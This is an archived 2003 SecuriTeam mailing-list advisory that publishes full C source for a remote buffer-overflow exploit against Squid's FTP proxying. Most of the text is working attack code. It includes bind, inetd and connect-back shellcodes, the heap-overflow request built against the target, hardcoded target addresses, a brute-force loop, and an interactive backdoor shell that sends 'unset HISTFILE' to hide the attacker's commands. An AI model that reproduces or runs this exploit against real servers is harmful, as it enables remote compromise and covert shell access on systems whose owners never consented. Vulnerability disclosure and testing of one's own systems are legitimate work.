[EXPL] Squid Buffer Overflow Exploit Code Released (FTP)
From: SecuriTeam (support_at_securiteam.com)
Date: 06/19/03
- Previous message: SecuriTeam: "[EXPL] xpcd Buffer Overflow Exploit Code"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
To: list@securiteam.com Date: 19 Jun 2003 14:10:11 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
Latest attack techniques.
You're a pen tester, but is google.com still your R&D team?
Now you can get trustworthy commercial-grade exploits and the latest
techniques from a world-class research group.
Learn more at http://www.coresecurity.com/promos/sit_e1,
or call 617-399-6980
- - - - - - - - -
Squid Buffer Overflow Exploit Code Released (FTP)
------------------------------------------------------------------------
SUMMARY
As we previously reported,
<http://www.securiteam.com/unixfocus/5BP0P2A6AY.html> Squid Buffer
Overflow (FTP), a remotely exploitable buffer overflow in the Squid
product allows attackers to cause the product to execute arbitrary code,
the following exploit code can be used to test your system for the
metioned vulnerability.
DETAILS
Vulnerable systems:
* Squid version 2.4STABLE
* Squid version 2.4DEVEL4 and prior
/**
** *OLD* *OLD* *OLD* *OLD**OLD* *OLD**OLD* *OLD**OLD* *OLD**OLD* *OLD*
**
** linux/x86 2.0 <= squid <= 2.4.DEVEL4 remote exploit (c) gunzip
**
** to compile type 'make squidx'
**
** Version 2.4STABLE(*) are vulnerable too but you have to play with
** USERLEN, NOPNUM, PASSLEN values to get exploit works (because of the
** different memory layout). Read below how to write new targets.
**
** This is however a rare exploitable bug because
**
** - Squid dies every time you overflow it and you have to wait > 10 sec
** - You can't bruteforce too much or squid will rest in peace forever
** - You MUST have the rights (acl) to use ftp proxying (not in default
conf)
** - Address differs alot (return addresses) from distro to distro
** - Victim host must have an ftp server running to connect to
** - Yes, you can change the host who runs ftp server but in this way
** you mess up the align so the exploit won't work (have to fix this)
**
** I'll put new versions if I've time on
** http://members.xoom.it/gunzip/
**
** comments to gunzip@ircnet - mAilto: <techieone@softhome.net>
**
** TODO: check align against host field, make real targets
**
** Version 0.4
**
** kisses to tankie
** greets: arcangelo, jestah, sorbo, and daphiel for testing
**
** *OLD* *OLD* *OLD* *OLD**OLD* *OLD**OLD* *OLD* *OLD* *OLD* *OLD* *OLD*
**/
/**
** Here are the young men, well where have they been ?
**/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <errno.h>
#include <string.h>
#include <fcntl.h>
#include <getopt.h>
char inetd_shellcode[] =
/*
* binds an inetd shell on port 5002 (lsd-pl.net + s-poly by zillion)
*/
"\x4b\xeb\x11\x5e\x31\xc9\xb1\x81\x80\x6c\x0e\xff\xd4\x80\xe9"
"\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\xbf\xf6\x2d\x05\x94"
"\x24\x3c\x03\x03\x47\x3c\x3c\x03\x36\x3d\x42\x5d\xb7\x24\x3a"
"\x3c\x01\x37\x5d\xbb\x24\x25\x2b\x27\x5d\xb5\x6d\x84\xdf\xa1"
"\x54\xbc\xad\xd3\xd3\xd3\x39\x37\x3c\x43\xf4\x46\x3a\x39\xf4"
"\x47\x48\x46\x39\x35\x41\xf4\x48\x37\x44\xf4\x42\x43\x4b\x35"
"\x3d\x48\xf4\x46\x43\x43\x48\xf4\x03\x36\x3d\x42\x03\x47\x3c"
"\xf4\x47\x3c\xf4\x01\x3d\x12\x03\x48\x41\x44\x03\x02\x4c\xf4"
"\x0f\x03\x49\x47\x46\x03\x47\x36\x3d\x42\x03\x3d\x42\x39\x48"
"\x38\xf4\x03\x48\x41\x44\x03\x02\x4c\x0f\x39\x37\x3c\x43\xf4"
"\x4d\x39\x35\x3c";
char forking_bind[] =
/*
* by eSDee - www.netric.org, encoded with s-poly by zillion
*/
"\x57\x5f\xeb\x11\x5e\x31\xc9\xb1\xc8\x80\x44\x0e\xff\x2b\x49"
"\x41\x49\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x06\x95\x06\xb0"
"\x06\x9e\x26\x86\xdb\x26\x86\xd6\x26\x86\xd7\x26\x5e\xb6\x88"
"\xd6\x85\x3b\xa2\x55\x5e\x96\x06\x95\x06\xb0\x25\x25\x25\x3b"
"\x3d\x85\xc4\x88\xd7\x3b\x28\x5e\xb7\x88\xe5\x28\x88\xd7\x27"
"\x26\x5e\x9f\x5e\xb6\x85\x3b\xa2\x55\x06\xb0\x0e\x98\x49\xda"
"\x06\x95\x15\xa2\x55\x06\x95\x25\x27\x5e\xb6\x88\xd9\x85\x3b"
"\xa2\x55\x5e\xac\x06\x95\x06\xb0\x06\x9e\x88\xe6\x86\xd6\x85"
"\x05\xa2\x55\x06\x95\x06\xb0\x25\x25\x2c\x5e\xb6\x88\xda\x85"
"\x3b\xa2\x55\x5e\x9b\x06\x95\x06\xb0\x85\xd7\xa2\x55\x0e\x98"
"\x4a\x15\x06\x95\x5e\xd0\x85\xdb\xa2\x55\x06\x95\x06\x9e\x5e"
"\xc8\x85\x14\xa2\x55\x06\x95\x16\x85\x14\xa2\x55\x06\x95\x16"
"\x85\x14\xa2\x55\x06\x95\x25\x3d\x04\x04\x48\x3d\x3d\x04\x37"
"\x3e\x43\x5e\xb8\x60\x29\xf9\xdd\x25\x28\x5e\xb6\x85\xe0\xa2"
"\x55\x06\x95\x15\xa2\x55\x06\x95\x5e\xc8\x85\xdb\xa2\x55\xc0"
"\x6e";
#define IP "\x7f\x01\x01\x01" /* 127.1.1.1 */
#define DPORT "\x99\x99" /* 39321 */
char connectback_shellcode[] =
/*
* by gloomy - www.netric.org
*/
"\x31\xc0\xb0\x02\xcd\x80\x31\xdb\x39\xd8\x75\x54"
"\x50\x40\x50\x40\x50\x89\xe1\x43\xb0\x66\xcd\x80"
"\x4b\x53\x53\x68" IP "\x66\x68" DPORT "\xb3\x02"
"\x66\x53\x89\xe2\xb3\x10\x53\x52\x50\x89\xe1\xb3"
"\x03\xb0\x66\xcd\x80\x31\xc9\x39\xc1\x75\x23\xb1"
"\x02\xb0\x3f\xcd\x80\x49\x75\xf9\xb0\x3f\xcd\x80"
"\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89"
"\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80\x31\xc0"
"\x40\xcd\x80";
#define CONNECT_BACK 0x1
#define CONNECT_TO 0x10
#define IP_OFFSET 28
#define PORT_OFFSET 34
struct hits
{
char * desc ;
char * code ;
unsigned short flag ;
unsigned short port ;
} ht[]=
{
{ "forking bind shellcode (45295)", forking_bind,
CONNECT_TO, 45295 },
{ "binds a shell via inetd (5002)", inetd_shellcode,
CONNECT_TO, 5002 },
{ "connects back on supplied host (39321)", connectback_shellcode,
CONNECT_BACK, 39321 },
{ NULL, 0, 0 }
};
#define TIMEOUT 0x5
#ifndef INADDR_NONE
#define INADDR_NONE 0xffffffff
#endif
#ifndef INADDR_ANY
#define INADDR_ANY 0x00000000
#endif
#ifdef DEBUG
#define debug(x...) printf(x)
#else
#define debug(x...)
#endif
/**
** a little rip from teso fmtlib
**/
#define OCT( b0, b1, b2, b3, addr ) { \
b0 = (addr >> 24) & 0xff; \
b1 = (addr >> 16) & 0xff; \
b2 = (addr >> 8) & 0xff; \
b3 = (addr ) & 0xff; \
}
void shell( int fd )
{
int rd ;
fd_set rfds;
static char buff[ 1024 ];
char INIT_CMD[] = "unset HISTFILE; echo; id; uname -a;\n";
if (write(fd, INIT_CMD, strlen( INIT_CMD )) < strlen(INIT_CMD)) {
fprintf(stderr,"[-] Error sending evil commands");
exit( EXIT_FAILURE );
}
while(1) {
FD_ZERO( &rfds );
FD_SET(0, &rfds);
FD_SET(fd, &rfds);
if(select(fd+1, &rfds, NULL, NULL, NULL) < 1) {
perror("[-] Select");
exit( EXIT_FAILURE );
}
if( FD_ISSET(0, &rfds) ) {
if( (rd = read(0, buff, sizeof(buff))) < 1) {
perror("[-] Read");
exit( EXIT_FAILURE );
}
if( write(fd,buff,rd) != rd) {
perror("[-] Write");
exit( EXIT_FAILURE );
}
}
if( FD_ISSET(fd, &rfds) ) {
if( (rd = read(fd, buff, sizeof(buff))) < 1) {
exit( EXIT_SUCCESS );
}
write(1, buff, rd);
}
}
}
unsigned long resolve( char * host )
{
unsigned long rev ;
struct hostent * he ;
if (( rev = inet_addr( host )) != INADDR_NONE )
{
return rev ;
}
if ( (he = gethostbyname( host )) == NULL )
{
perror("[-] Gethostbyname");
return -1;
}
else
{
return ((struct in_addr *)(he->h_addr))->s_addr ;
}
}
int connect_to_host( unsigned long ip, unsigned short port )
{
int ret, flags, s ;
struct sockaddr_in server ;
memset( &server, 0x0, sizeof(server) );
server.sin_port = htons ( port );
server.sin_family = AF_INET ;
server.sin_addr.s_addr = ip ;
if ((s = socket(AF_INET, SOCK_STREAM, 0)) == -1 ) {
perror("[-] Socket");
return -1 ;
}
/**
** sets non blocking socket and connects, ripped somewhere
**/
if ((flags = fcntl (s, F_GETFL, 0)) == -1 ) {
close( s );
return -1;
}
if (fcntl(s, F_SETFL, flags | O_NONBLOCK) == -1) {
close( s );
return -1;
}
ret = connect(s, (struct sockaddr *)&server, sizeof(server));
if ( ret < 0 )
{
if ( errno != EINPROGRESS ) {
close( s );
return -1;
}
else
{
int n ;
struct timeval tv = { TIMEOUT, 0 };
fd_set rset, wset;
FD_ZERO( &rset );
FD_ZERO( &wset );
FD_SET( s, &rset );
FD_SET( s, &wset );
if ((n = select( s + 1, &rset, &wset, NULL, &tv)) == -1 ) {
perror("[-] Select");
return -1;
}
/**
** handles timeout
**/
if (n == 0) {
close( s );
fprintf(stderr,"[-] Timeout\n");
return -1;
}
if (FD_ISSET( s, &rset ) || FD_ISSET( s, &wset ))
{
int error = 0 ;
int len = sizeof( error );
if (getsockopt(s, SOL_SOCKET, SO_ERROR, &error, &len) == -1) {
perror("[-] Getsockopt");
return -1;
}
if (error != 0) {
debug("[*] SO_ERROR != 0\n");
return -1;
}
}
else
{
return -1 ;
}
}
}
/**
** restores flags and returns
**/
if ( fcntl(s, F_SETFL, flags) == -1 )
return -1;
else
return s;
}
size_t net_write( int fd, char * buf, size_t size )
{
struct timeval tv = { TIMEOUT, 0 };
fd_set wfds ;
int ret ;
FD_ZERO( &wfds );
FD_SET( fd, &wfds );
if ( (ret = select( fd+1, NULL, &wfds, NULL, &tv )) == -1 ) {
perror("[-] Select");
exit( EXIT_FAILURE );
}
if ( ret == 0 ) {
close( fd );
fprintf(stderr,"[-] Timeout\n");
exit( EXIT_FAILURE );
}
if ( FD_ISSET( fd, &wfds ) )
{
return( write( fd, buf, size ) );
}
else
{
fprintf(stderr,"[-] Error in sending data\n");
exit( EXIT_FAILURE );
}
}
size_t net_read( int fd, char * buf, size_t size )
{
struct timeval tv = { TIMEOUT, 0 };
fd_set rfds ;
int ret ;
FD_ZERO( &rfds );
FD_SET( fd, &rfds );
if ( (ret = select( fd+1, NULL, &rfds, NULL, &tv )) == -1 ) {
perror("[-] Select");
exit( EXIT_FAILURE );
}
if ( ret == 0 ) {
close( fd );
fprintf(stderr,"[-] Timeout\n");
exit( EXIT_FAILURE );
}
if ( FD_ISSET( fd, &rfds ) )
{
return( read( fd, buf, size ) );
}
else
{
fprintf(stderr,"[-] Error in sending data\n");
exit( EXIT_FAILURE );
}
}
char * make_connback_shellcode( const char * hellcode,
unsigned long ip,
unsigned short port,
int ip_offset,
int port_offset )
{
/**
** ip and port MUST be in host byte order
**/
char a, b, c, d;
char * hell = (char *)strdup( hellcode );
fflush( stderr );
if ( !hell ) {
fprintf( stderr, "[-] Out of memory !\n");
exit( EXIT_FAILURE );
}
debug("[*] Using ip=0x%.8x port=%d\n", (unsigned int)ip, port );
/**
** can't contain 0x0a and 0x0d too !!
**/
OCT( a, b, c, d, ip );
if ( ( !a || !b || !c || !d ) ||
(( a == 0xa )||( b == 0xa )||( c == 0xa )|| ( d == 0xa ))||
(( a == 0xd )||( b == 0xd )||( c == 0xd )|| ( d == 0xd )) )
{
fprintf(stderr, "[-] Ip contains invalid byte(s) that can't be in the
shellcode\n"
"[-] Change ip/shellcode and retry.\n");
exit( EXIT_FAILURE );
}
if ( ( !(port & 0xff ) || !(port & 0xff00 )) ||
( (( port & 0xff )== 0xa ) || (( port & 0xff00 )== 0xa )) ||
( (( port & 0xff )== 0xd ) || (( port & 0xff00 )== 0xd )) )
{
fprintf(stderr, "[-] Port contains invalid byte(s) that can't be in
the shellcode\n"
"[-] Change bindport/shellcode and retry.\n");
exit( EXIT_FAILURE );
}
*(unsigned long *)( hell + ip_offset ) = htonl( ip );
*(unsigned short *)( hell + port_offset ) = htons( port );
return hell;
}
/**
** if you have time to add real targets send me them,
** I'll return to you the xpl with all new targets and fixes
**/
#define NOPNUM 800
#define USERLEN 11
#define PASSLEN 28
#define URLLEN 24
#define SMARTJUMP "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
#define MASK 0x7
#define BRUTE_START ( 0x346000 + tg[n].retloc )
#define BRUTE_END ( 0x366000 + tg[n].retloc )
#define PORT 3128
#define DELAY 12
#define request2size(req) ( req += (sizeof( size_t ) + MASK) &~ MASK )
/**
** retloc :
** echo 0x`objdump -R /usr/sbin/squid | grep write | awk '{print $1}'`
**
** retaddr:
** gdb squid `pidof squid` then on another console run the exploit
** wait for squid to segfault, if it segfaults to an address like
** 0x08041XXX then you just have to look for nopcode just at
** 0xRETLOC + 346000 (nops look like 0xeb27eb27)
**
** ie. if your retloc is 0x080bb1f8 then just do something like
** (gdb) x/100000x 0x080bb1f8+345000
**
** padding:
** if squid does not segfault on an address like 0x08XXXXXX
** then you have to play with lenght of password, user or url
**/
struct options
{
char * desc ;
unsigned long retaddr ;
unsigned long retloc ;
} tg[]=
{
{ "2.4.DEVEL4 - Debian 3.0 from src" , 0x08401ba4, 0x080bb1f8 },
{ "2.3STABLE5 - Debian 3.0 from src" , 0x0841982c, 0x080b80a8 },
{ NULL, 0, 0 }
};
void usage( char * a )
{
fprintf( stderr, "Usage: %s -v victim [options]\n\n"
"-v\tvictim ip or fqhn\n"
"-p\tport to connect to (default 3128)\n"
"-f\tdoes not check if host is vulnerable (forces exploit)\n"
"-j\tjust check if host is vulnerable\n"
"-i\tip address for connect back shellcode\n"
"-P\tport of connect back shellcode\n"
"-t\tone of the targets (for a list type -t X)\n"
"-c\tone of the shellcodes (for a list type -c X)\n"
"-b\tbruteforce mode\n"
"-s\tstep for bruteforce\n"
"-d\tdelay between attacks (12 secs default)\n"
"-n\tnumber of nops (try 800, 1024, 1500, 2068)\n"
"-r\treturn address (shellcode address)\n"
"-g\taddress to be overwritten\n\n", a );
exit( EXIT_FAILURE );
}
void show_target_list()
{
int i;
fprintf( stderr, "[+] TARGETS:\n\n");
for (i = 0 ; tg[ i ].desc ; i++ )
fprintf ( stderr, " %d - %s\n", i, tg[ i ].desc);
printf("\n");
exit( EXIT_FAILURE );
}
void show_code_list()
{
int i;
fprintf( stderr, "[+] SHELLCODES\n\n");
for (i = 0 ; ht[ i ].desc ; i++ )
fprintf ( stderr, " %d - %s\n", i, ht[ i ].desc );
printf("\n");
exit( EXIT_FAILURE );
}
int squid_check_if_vuln( unsigned long ip, char * host )
{
int s ;
char buf[ 1024 ];
char pad[ 64 ];
memset( buf, 0x0, sizeof(buf) );
memset( pad, 0x7e, sizeof(pad) );
pad[ 63 ] =0;
snprintf( buf, sizeof(buf) - 1,
"GET ftp://%s:%s@%s/ HTTP/1.0\r\n\r\n",
pad, pad, host );
buf[ 1024 - 1 ] =0;
if ( (s = connect_to_host( ip, 3128 )) == -1 )
return 0;
if (net_write( s, buf, strlen(buf) ) == strlen(buf)) {
memset( buf, 0x0, sizeof(buf) );
if( net_read( s, buf, sizeof(buf)) > 0 ) {
close( s );
return 0;
}
else {
close( s );
return 1;
}
}
close( s );
return 0;
}
/**
** every leeto exploit MUST have dots in it
**/
void wait_dots( int s )
{
int i;
fprintf( stdout, "[+] Sleeping %d secs to let squid restart", s);
for ( i=0; i <= s ; i++ )
{
fflush( stdout );
fprintf(stdout, ".");
sleep( 1 );
}
fprintf( stdout, "\n" );
}
int main(int argc, char *argv[])
{
unsigned long ip = 0x7f000001,
local_ip = 0x0,
retaddr = 0x0;
unsigned int len, i,
step = NOPNUM - 256,
nopnum = NOPNUM,
delay = DELAY;
unsigned short port = PORT ;
int opt, s, n =0, c =0, brute =0, force =0;
char user [ 128 ];
char pass [ 128 ];
char url [ 128 ];
char evil [ 4096 ];
char nops [ NOPNUM ];
char * t ;
char * host = "0.0.0.0" ;
char * victim = "127.0.0.1";
fprintf(stdout, "\nlinux/x86 remote exploit against squid <= 2.4.STABLE3
by gunzip\n\n");
if ( argc < 3 )
usage( argv[0] );
while ((opt = getopt(argc, argv, "n:d:i:P:jfp:c:t:v:r:g:bs:h")) != EOF)
{
switch(opt)
{
case 'd': delay = atoi(optarg); break;
case 'n': nopnum = atoi(optarg); break;
case 'i': local_ip = inet_addr(optarg); break;
case 'P': ht[c].port = atoi(optarg); break;
case 'f': force=1; break;
case 'j': force=-1; break;
case 'p': port = atoi(optarg) ;
case 'c': if ( *optarg == 'X' ) show_code_list();
else c = atoi(optarg); break;
case 't': if ( *optarg == 'X' ) show_target_list();
else n = atoi(optarg); break;
case 'v': victim = strdup( optarg ); break ;
case 'r': tg[n].retaddr = strtoul( optarg, NULL, 16 ); break ;
case 'g': tg[n].retloc = strtoul( optarg, NULL, 16 ); break ;
case 'b': brute=1; break;
case 's': step=atoi(optarg); break;
case 'h': default: usage( "./squidx" ); break;
}
}
if ( ht[c].port > 65535 || ht[c].port < 1 ) {
fprintf(stderr, "[-] Not valid port for connect back code\n");
return -1;
}
if ( ht[c].flag & CONNECT_BACK ) {
if ( !local_ip || local_ip == -1 ) {
fprintf(stderr,"[-] You must supply a valid ip for connect back
shellcode.\n");
return -1;
}
ht[c].code = make_connback_shellcode( ht[c].code,
ntohl( local_ip ),
ht[c].port,
IP_OFFSET,
PORT_OFFSET
);
}
if ( (ip = resolve( victim )) == -1 ) {
fprintf(stderr, "[-] Cannot resolve victim ip\n");
return -1;
}
if ( !force ) {
if ( squid_check_if_vuln( ip, host ) )
fprintf(stdout, "[+] Host seems vuln !\n");
else {
fprintf(stderr, "[-] Host seems not vuln, sorry.\n");
return -1;
}
if ( force == -1 )
return 1;
wait_dots( 12 );
}
fprintf(stdout,"[+] Target %s\n", tg[n].desc);
fprintf(stdout,"[+] Host is %s\n", victim );
/**
** this is for align and overflow
**/
memset( user, 0x7e, USERLEN );
user[ USERLEN ] = 0;
memset( pass, 0x7e, PASSLEN );
pass[ PASSLEN ] = 0 ;
len = 64 + strlen( user ) + strlen( pass ) + strlen( host ) + URLLEN;
t = (char *)malloc( len );
memset( evil, 0x00, sizeof(evil));
memset( nops, 0xeb, sizeof(nops));
memset( url, 0x41, sizeof(url));
/**
** that's because 0x27 act as a nop
**/
for ( i=1; i < sizeof(nops) ; i+=2 )
nops[ i ] = 0x27 ;
nops[ nopnum - strlen(ht[c].code) - 8 ] = 0 ;
snprintf( evil, sizeof(evil)-1, "Accept: %s%s%s\r\n\r\n", nops,
SMARTJUMP, ht[c].code);
for ( retaddr=(brute ? BRUTE_START : tg[n].retaddr ); retaddr <= (brute
? BRUTE_END : tg[n].retaddr ); retaddr += step )
{
memset( t, 0x0, len );
fprintf(stdout,"[+] Using retaddr=0x%.8x retloc=0x%.8x code=%d
step=%d\n",
(u_int)retaddr, (u_int)tg[n].retloc,
strlen(ht[c].code), step);
*(long *)&url[0] = 0x4142432f ; /* dummy */
*(long *)&url[4] = 0xfffffffc ; /* prevsize */
*(long *)&url[8] = 0xfffffffc ; /* size field */
*(long *)&url[12] = 0xdeadbeef ; /* dummy */
*(long *)&url[16] = tg[n].retloc - 12 ; /* fd */
*(long *)&url[20] = retaddr ; /* bk */
url[ URLLEN ] = 0 ;
debug("[*] Using host=%d user=%d url=%d pass=%d\n",
strlen(host), strlen(user),
strlen(url), strlen(pass));
debug("[*] Using buffer_len=%d real_malloced_size=%d\n",
len, request2size( len ));
strcat( t, "GET " );
strcat( t, "ftp://" );
strcat( t, user );
strcat( t, ":" );
strcat( t, pass );
strcat( t, "@" );
strcat( t, host );
strcat( t, url );
strcat( t, " HTTP/1.0\r\n" );
debug("[*] Using string=%d evil=%d\n", strlen(t), strlen(evil));
if ( (s = connect_to_host( ip, 3128 )) == -1 ) {
fprintf(stderr, "[-] Could not connect to host %s\n", victim );
return -1;
}
net_write( s, t, strlen(t) );
net_write( s, evil, strlen(evil) );
if (( brute ) && !(brute++ % 5) )
wait_dots( 22 );
else
wait_dots( 12 );
close( s );
sleep( 1 );
if ( ht[c].flag & CONNECT_TO )
{
int y = connect_to_host( ip, ht[c].port );
fprintf( stdout, "[+] Trying connecting to the backdoor\n");
if ( y > 0 ) shell( y );
}
fprintf(stdout, "[+] I did not work.\n");
}
return 1;
}
/* http://members.xoom.it/gunzip/ */
ADDITIONAL INFORMATION
The information has been provided by <mailto:techieone@softhome.net>
gunzip.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: SecuriTeam: "[EXPL] xpcd Buffer Overflow Exploit Code"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
- (fwd) Remote BSD ftpd glob exploit
... extern int errno; ... char *description; ... void *Realloc;
... translates a host from its string representation (either in numbers ... (FreeBSD-Security) - [EXPL] Remote Vulnerability in 4D WebSTAR Server (Long PASS, PCC Exploit)
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... int get_connect (int port,
char *host); ... int check_bindshell(int port, char *host); ... (Securiteam) - Apache 1.3.x mod_userdir Exploit (wgetusr.c)
... int connect_timeout(int sfd, struct sockaddr *serv_addr, int timeout); ...
void vrfy_apache(char *host); ... int trylogonFTP(char *host, char
*user, char *pass); ... (Bugtraq) - [Full-disclosure] Linux kernel 0day - dynamite inside, dont burn your fingers
... static char b; ... static volatile int *c; ... memset (e,
0, sizeof (e)); ... (Full-Disclosure) - [Full-disclosure] Linux kernel 0day - dynamite inside, dont burn your fingers
... static char b; ... static volatile int *c; ... memset (e,
0, sizeof (e)); ... (Full-Disclosure)
